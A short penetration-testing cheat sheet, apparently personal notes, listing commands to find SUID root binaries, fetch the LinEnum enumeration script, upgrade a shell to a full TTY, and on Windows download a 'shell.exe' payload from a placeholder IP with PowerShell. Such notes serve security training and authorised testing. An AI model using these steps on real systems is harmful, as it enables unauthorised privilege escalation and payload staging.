find / -type f -name file.txt 2>/dev/null		# find file

find / -user root -perm -4000 -exec ls -ldb {} \; 	# find suid
find / -user root -perm /4000 2>/dev/null

# Linux enumerate
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

# better shell
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm # for commands like clear

finally background the shell (Ctrl +Z) and enter
stty raw -echo; fg # turn off own terminal echo (which gives acces to autocomplete, arrwo keys, Ctrl + C)


################
# Windows
# Download file
powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
